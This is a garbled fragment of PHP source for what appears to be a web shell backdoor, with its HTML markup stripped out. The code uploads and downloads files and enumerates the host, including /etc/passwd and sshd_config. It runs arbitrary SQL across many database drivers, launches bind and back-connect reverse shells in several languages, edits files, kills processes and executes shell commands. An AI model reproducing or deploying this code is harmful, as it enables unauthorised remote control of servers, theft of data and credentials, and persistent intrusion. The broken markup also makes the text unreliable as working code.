file uploaded to ".$pi."
"; else $msg = "failed to upload ".$fn."
"; } else $msg = "failed to upload ".$fn."
"; } elseif(isset($_REQUEST['uploadurl'])){ // function dlfile($url,$fpath){ $p = cp(ss($_REQUEST['savefolderurl'])); if(!is_dir($p)) $p = cp(dirname($p)); $fu = ss($_REQUEST['fileurl']); $fn = basename($fu); if(isset($_REQUEST['savefilenameurl']) && (trim($_REQUEST['savefilenameurl'])!="")) $fn = ss($_REQUEST['savefilenameurl']); $fp = cp($p).$fn; $st = dlfile($fu,$fp); if($st) $msg = "file uploaded to ".$fp."
"; else $msg = "failed to upload ".$fn."
"; } $s_result .= $msg; $s_result .= " "; } // show server information elseif(isset($_REQUEST['info'])){ // access to compiler/interpreter $s_python = check_access("python"); $s_perl = check_access("perl"); $s_ruby = check_access("ruby"); $s_gcc = check_access("gcc"); $s_java = check_access("java"); $s_result = ""; // server misc info $s_result .= "Server Info
"; $s_result .= "| php | ".phpversion()." |
| python | ".exe("python -V")." |
| perl | ".exe("perl -e \"print \$]\"")." |
| ruby | ".exe("ruby -v")." |
| gcc | ".$gcc_ver." |
| java | ".str_replace("\n", ", ", exe("java -version"))." |
| /etc/passwd | /etc/passwd is readable |
| /etc/issue | /etc/issue is readable |
| /etc/ssh/sshd_config | /etc/ssh/sshd_config is readable |
CPU Info
"; $s_result .= "";
$i_buffs = explode("\n\n", $i_buff);
foreach($i_buffs as $i_buffss){
$i_buffss = trim($i_buffss);
if($i_buffss!=""){
$i_buffsss = explode("\n",$i_buffss);
$s_result .= "";
foreach($i_buffsss as $i){
$i = trim($i);
if($i!=""){
$ii = explode(":",$i);
if(count($ii)==2) $s_result .= "
";
}
}
$s_result .= "
";
}
// mem info
if($i_buff=trim(file_get_contents("/proc/meminfo"))){
$s_result .= "| ".$ii[0]." | ".$ii[1]." |
Memory Info
"; $i_buffs = explode("\n",$i_buff); $s_result .= "| ".$ii[0]." | ".$ii[1]." |
Partitions Info
"; $s_result .= "";
$i_buffs = explode("\n\n", $i_buff);
$s_result .= "
";
$s_result .= "
";
}
}
$phpinfo = array(
"PHP General" => INFO_GENERAL,
"PHP Configuration" => INFO_CONFIGURATION,
"PHP Modules" => INFO_MODULES,
"PHP Environment" => INFO_ENVIRONMENT,
"PHP Variables" => INFO_VARIABLES
);
foreach($phpinfo as $p=>$i){
$s_result .= "| ".$h." | "; $s_result .= "
|---|
| ".$r." | "; $s_result .= "
".$p."
"; ob_start(); eval("phpinfo(".$i.");"); $b = ob_get_contents(); ob_end_clean(); $a = strpos($b,"")+6; $z = strpos($b,""); $body = substr($b,$a,$z-$a); $body = str_replace(",",", ",$body); $body = str_replace(";","; ",$body); $s_result .= "".$body."
";
}
} // working with database
elseif(isset($_REQUEST['db'])){
// sqltype : mysql, mssql, oracle, pgsql, odbc, pdo
$sqlhost = isset($_REQUEST['sqlhost'])? ss($_REQUEST['sqlhost']) : "localhost";
$sqlport = isset($_REQUEST['sqlport'])? ss($_REQUEST['sqlport']) : "";
$sqluser = isset($_REQUEST['sqluser'])? ss($_REQUEST['sqluser']) : "";
$sqlpass = isset($_REQUEST['sqlpass'])? ss($_REQUEST['sqlpass']) : "";
$odbcdsn = isset($_REQUEST['odbcdsn'])? ss($_REQUEST['odbcdsn']) : "";
$odbcuser = isset($_REQUEST['odbcuser'])? ss($_REQUEST['odbcuser']) : "";
$odbcpass = isset($_REQUEST['odbcpass'])? ss($_REQUEST['odbcpass']) : "";
$pdodsn = isset($_REQUEST['pdodsn'])? ss($_REQUEST['pdodsn']) : "";
$pdouser = isset($_REQUEST['pdouser'])? ss($_REQUEST['pdouser']) : "";
$pdopass = isset($_REQUEST['pdopass'])? ss($_REQUEST['pdopass']) : "";
$sqlite_file = isset($_REQUEST['sqlite_file'])? ss($_REQUEST['sqlite_file']) : "";
$sqls = "";
$q_result = "";
$hostandport = $sqlhost;
if(trim($sqlport)!="") $hostandport = $sqlhost.":".$sqlport;
$sqlform_tpl = "";
if(isset($_REQUEST['mysql']) && ($con = mysql_connect($hostandport,$sqluser,$sqlpass))){
if(isset($_REQUEST['sqlcode'])){
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";",$sqls);
foreach($querys as $query){
if(trim($query) != ""){
$hasil = mysql_query($query);
if($hasil){
$q_result .= "".$query."; [ ok ]
".$query."; [ error ]
"; } } } else $sqls = "SHOW databases;"; $s_result .= str_replace("__sqltype__","mysql",str_replace("__sqlcode__", $sqls, $sqlform_tpl)); $s_result .= "".$q_result."
";
if($con) mysql_close($con);
}
elseif(isset($_REQUEST['mssql']) && ($con = mssql_connect($hostandport,$sqluser,$sqlpass))){
if(isset($_REQUEST['sqlcode'])){
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";",$sqls);
foreach($querys as $query){
if(trim($query) != ""){
$hasil = mssql_query($query);
if($hasil){
$q_result .= "".$query."; [ ok ]
".$query."; [ error ]
"; } } } else $sqls = "SELECT name FROM master..sysdatabases;"; $s_result .= str_replace("__sqltype__","mssql",str_replace("__sqlcode__", $sqls, $sqlform_tpl)); $s_result .= "".$q_result."
";
if($con) mssql_close($con);
}
elseif(isset($_REQUEST['sqlsrv']) && ($con = sqlsrv_connect($hostandport,$sqluser,$sqlpass))){
if(isset($_REQUEST['sqlcode'])){
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";",$sqls);
foreach($querys as $query){
if(trim($query) != ""){
$hasil = sqlsrv_query($query);
if($hasil){
$q_result .= "".$query."; [ ok ]
".$query."; [ error ]
"; } } } else $sqls = "SELECT name FROM master..sysdatabases;"; $s_result .= str_replace("__sqltype__","sqlsrv",str_replace("__sqlcode__", $sqls, $sqlform_tpl)); $s_result .= "".$q_result."
";
if($con) sqlsrv_close($con);
}
elseif(isset($_REQUEST['oracle']) && ($con = oci_connect($sqluser,$sqlpass,$hostandport))){
if(isset($_REQUEST['sqlcode'])){
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";",$sqls);
foreach($querys as $query){
if(trim($query) != ""){
$st = oci_parse($con, $query);
if(oci_execute($st)){
$q_result .= "".$query."; [ ok ]
| ".htmlspecialchars(oci_field_name($st,$i))." | "; $q_result .= "
|---|
".$query."; [ error ]
"; } } } else $sqls = "SELECT USERNAME FROM SYS.ALL_USERS ORDER BY USERNAME;"; $s_result .= str_replace("__sqltype__","oracle",str_replace("__sqlcode__", $sqls, $sqlform_tpl)); $s_result .= "".$q_result."
";
if($con) oci_close($con);
}
elseif(isset($_REQUEST['pgsql']) && ($con = pg_connect("host=$sqlhost user=$sqluser password=$sqlpass port=$sqlport"))){
if(isset($_REQUEST['sqlcode'])){
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";",$sqls);
foreach($querys as $query){
if(trim($query) != ""){
$hasil = pg_query($query);
if($hasil){
$q_result .= "".$query."; [ ok ]
".$query."; [ error ]
"; } } } else $sqls = "SELECT schema_name FROM information_schema.schemata;"; $s_result .= str_replace("__sqltype__","pgsql",str_replace("__sqlcode__", $sqls, $sqlform_tpl)); $s_result .= "".$q_result."
";
if($con) pg_close($con);
}
elseif(isset($_REQUEST['sqlite']) && ($con = sqlite_open($sqlite_file))){
if(isset($_REQUEST['sqlcode'])){
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";",$sqls);
foreach($querys as $query){
if(trim($query) != ""){
$hasil = sqlite_query($con, $query);
if($hasil){
$q_result .= "".$query."; [ ok ]
".$query."; [ error ]
"; } } } else $sqls = "SELECT name FROM sqlite_master WHERE type='table';"; $s_result .= " "; $s_result .= "".$q_result."
";
if($con) sqlite_close($con);
}
elseif(isset($_REQUEST['sqlite3']) && ($con = new SQLite3($sqlite_file))){
if(isset($_REQUEST['sqlcode'])){
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";",$sqls);
foreach($querys as $query){
if(trim($query) != ""){
$hasil = $con->query($query);
if($hasil){
$q_result .= "".$query."; [ ok ]
| ".htmlspecialchars($hasil->columnName($i))." | "; $q_result .= "
|---|
| ".htmlspecialchars($dataz)." | "; } $q_result .= "
".$query."; [ error ]
"; } } } else $sqls = "SELECT name FROM sqlite_master WHERE type='table';"; $s_result .= " "; $s_result .= "".$q_result."
";
if($con) $con->close();
}
elseif(isset($_REQUEST['odbc']) && ($con = odbc_connect($odbcdsn,$odbcuser,$odbcpass))){
if(isset($_REQUEST['sqlcode'])){
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";",$sqls);
foreach($querys as $query){
if(trim($query) != ""){
$hasil = odbc_exec($con, $query);
if($hasil){
$q_result .= "".$query."; [ ok ]
| ".htmlspecialchars(odbc_field_name($hasil,$i))." | "; $q_result .= "
|---|
| ".htmlspecialchars($dataz)." | "; } $q_result .= "
".$query."; [ error ]
"; } } } else $sqls = ""; $s_result .= " "; $s_result .= "".$q_result."
";
if($con) odbc_close($con);
}
elseif(isset($_REQUEST['pdo'])){
// create object
$mypdo = new PDO($pdodsn,$pdouser,$pdopass);
if(isset($_REQUEST['sqlcode'])){
$sqls = ss($_REQUEST['sqlcode']);
$querys = explode(";",$sqls);
foreach($querys as $query){
if(trim($query) != ""){
if($hasil = $mypdo->query($query)){
$q_result .= "".$query."; [ ok ]
| ".htmlspecialchars($fn)." | "; $savefirstrow[] = $fv; } $q_result .= "
|---|
| ".htmlspecialchars($fv)." | "; } $q_result .= "
| ".htmlspecialchars($dataz)." | "; } $q_result .= "
".$query."; [ error ]
"; } $q_result .= ""; } } } else $sqls = ""; $s_result .= " "; $s_result .= "".$q_result."
";
}
else{
// sqltype : mysql, mssql, oracle, pgsql, sqlite, sqlite3, odbc, pdo
$sqllist = array();
if(function_exists("mysql_connect")) $sqllist["mysql"] = "connect to MySQL - using mysql_*";
if(function_exists("mssql_connect")) $sqllist["mssql"] = "connect to MsSQL - using mssql_*";
if(function_exists("sqlsrv_connect")) $sqllist["sqlsrv"] = "connect to MsSQL - using sqlsrv_*";
if(function_exists("pg_connect")) $sqllist["pgsql"] = "connect to PostgreSQL - using pg_*";
if(function_exists("oci_connect")) $sqllist["oracle"] = "connect to oracle - using oci_*";
if(function_exists("sqlite_open")) $sqllist["sqlite"] = "connect to SQLite - using sqlite_*";
if(class_exists("SQLite3")) $sqllist["sqlite3"] = "connect to SQLite3 - using class SQLite3";
if(function_exists("odbc_connect")) $sqllist["odbc"] = "connect via ODBC - using odbc_*";
if(class_exists("PDO")) $sqllist["pdo"] = "connect via PDO - using class PDO";
foreach($sqllist as $sqltype=>$sqltitle){
if($sqltype=="odbc"){
$s_result .= "".$sqltitle."
| DSN / Connection String | |
| Username | |
| Password |
".$sqltitle."
| DSN / Connection String | |
| Username | |
| Password |
".$sqltitle."
| DB File |
".$sqltitle."
| Host | |
| Username | |
| Password | |
| Port (optional) |
Directory ".$cwd." is not writable, please change to a writable one
"; $rs_err = ""; foreach($rslist as $rstype=>$rstitle){ $split = explode("_",$rstype); if($split[0]=="bind"){ $rspesan = $rspesana; $rsdisabled = "disabled=\"disabled\""; $rstarget = $s_server_ip; $labelip = "Server IP"; } elseif($split[0]=="back"){ $rspesan = $rspesanb; $rsdisabled = ""; $rstarget = $s_my_ip; $labelip = "Target IP"; } if(isset($_REQUEST[$rstype])){ if(isset($_REQUEST["rshost_".$rstype])) $rshost_ = ss($_REQUEST["rshost_".$rstype]); if(isset($_REQUEST["rsport_".$rstype])) $rsport_ = ss($_REQUEST["rsport_".$rstype]); if($split[0]=="bind") $rstarget_packed = $rsport_; elseif($split[0]=="back") $rstarget_packed = $rsport_." ".$rshost_; if($split[1]=="pl") $rscode = $rs_pl; elseif($split[1]=="py") $rscode = $rs_py; elseif($split[1]=="rb") $rscode = $rs_rb; elseif($split[1]=="c") $rscode = $rs_c; elseif($split[1]=="win") $rscode = $rs_win; elseif($split[1]=="php") $rscode = $rs_php;; $buff = rs($rstype,$rstarget_packed,$rscode); if($buff!="") $rs_err = "".htmlspecialchars($buff)."
"; } $s_result .= "".$rstitle."
| ".$labelip." | |
| Port |
| Filename | ".$f." |
| Size | ".gs($f)." |
| Permission | ".gp($f)." |
| Create time | ".date("d-M-Y H:i",filectime($f))." |
| Last modified | ".date("d-M-Y H:i",filemtime($f))." |
| Last accessed | ".date("d-M-Y H:i",fileatime($f))." |
| Actions | edit | rename | delete ".$dlfile." |
| View | text | code | image |
Image Size = ( ".$width." x ".$height." )
"; if($width > 800){ $width = 800; $imglink = ""; } else $imglink = ""; $s_result .= "
".$imglink."
![\"\"](\"?d=".$cwd."&img=".$filn."\")
";
}
elseif($t=="code"){
$s_result .= "";
$file = wordwrap(file_get_contents($f),160,"\n",true);
$buff = highlight_string($file,true);
$old = array("0000BB","000000","FF8000","DD0000", "007700");
$new = array("4C83AF","888888", "87DF45", "EEEEEE" , "FF8000");
$buff = str_replace($old,$new, $buff);
$s_result .= $buff;
$s_result .= "
";
}
else {
$s_result .= "";
$s_result .= str_replace("<","<",str_replace(">",">",(wordwrap(file_get_contents($f),160,"\n",true))));
$s_result .= "";
}
}
elseif(is_dir($f)){
chdir($f);
$cwd = cp(getcwd());
$s_result .= showdir($cwd);
}
} // edit file
elseif(isset($_REQUEST['edit'])){
$f = ss($_REQUEST['edit']);
$fc = "";
$fcs = "";
if(is_file($f)) $fc = file_get_contents($f);
if(isset($_REQUEST['fcsubmit'])){
$fc = ssc($_REQUEST['fc']);
if($filez = fopen($f,"w")){
$time = date("d-M-Y H:i",time());
if(fwrite($filez,$fc)!==false) $fcs = "file saved @ ".$time;
else $fcs = "failed to save";
fclose($filez);
}
else $fcs = "permission denied";
}
$s_result .= "
";
} // task manager
elseif(isset($_REQUEST['ps'])){
$buff = "";
// kill process specified by pid
if(isset($_REQUEST['pid'])){
$p = ss($_REQUEST['pid']);
if(function_exists("posix_kill")) $buff = (posix_kill($p,'9'))? "Process with pid ".$p." has been successfully killed":"Unable to kill process with pid ".$p;
else{
if(!$s_win) $buff = exe("kill -9 ".$p);
else $buff = exe("taskkill /F /PID ".$p);
}
}
if(!$s_win) $h = "ps aux";
else $h = "tasklist /V /FO csv";
$wcount = 11;
$wexplode = " ";
if($s_win) $wexplode = "\",\"";
$res = exe($h);
if(trim($res)=='') $s_result = "Error getting process list
"; else{ if($buff!="") $s_result = "".$buff."
"; $s_result .= "| action | "; foreach($psln as $p){ $s_result .= "".trim(trim(strtolower($p)),"\"")." | "; } $s_result .= "||
|---|---|---|---|
| kill | ".trim(trim($p),"\"")." | "; $tblcount++; } else{ $tblcount++; if($tblcount == count($psln)) $s_result .= "".trim(trim($p), "\"")." | "; else $s_result .= "".trim(trim($p), "\"")." | "; } } $s_result .= "
".$nd." is not a directory".""; } else{ $s_r = htmlspecialchars(exe($cmd)); if($s_r != '') $s_result .= "
".$s_r.""; else $s_result .= showdir($cwd); } } else $s_result .= showdir($cwd); } else{ if(!empty($dirmsg)) $s_result .= "
".$dirmsg."
"; $s_result .= showdir($cwd); } } // print useful info $s_info = "| ".$s_system." | ||
| ".$s_software." | ||
| server ip : ".$s_server_ip." | your ip : ".$s_my_ip; $s_info .= " | Time @ Server : ".date("d M Y H:i:s",time()); $s_info .= " | ||
|
|
|